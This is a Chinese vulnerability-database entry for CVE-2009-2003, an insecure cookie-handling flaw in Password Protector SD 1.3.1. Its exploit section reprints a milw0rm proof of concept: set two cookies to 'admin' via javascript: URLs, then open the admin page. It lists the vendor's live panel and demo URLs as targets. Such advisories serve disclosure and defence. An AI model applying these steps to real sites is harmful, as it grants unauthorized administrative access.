Ascad Networks Cookie权限绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117760 漏洞类型 授权问题
发布时间 2009-05-13 更新时间 2009-06-09
CVE编号 CVE-2009-2003 CNNVD-ID CNNVD-200906-110
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8668
https://cxsecurity.com/issue/WLB-2009060123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-110
|漏洞详情
AscadNetworksPasswordProtectorSD1.3.1版本允许远程攻击者通过把(1)c7portaland(2)cooknamecookies设置成"admin",绕过权限并获得管理访问权。
|漏洞EXP
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";

step 2 [add]: javascript:document.cookie="cookname=admin;path=/";

step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home


in control panel : 

http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home


demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE

all my Friends

# milw0rm.com [2009-05-13]
|参考资料

来源:BID
名称:34930
链接:http://www.securityfocus.com/bid/34930
来源:MILW0RM
名称:8668
链接:http://www.milw0rm.com/exploits/8668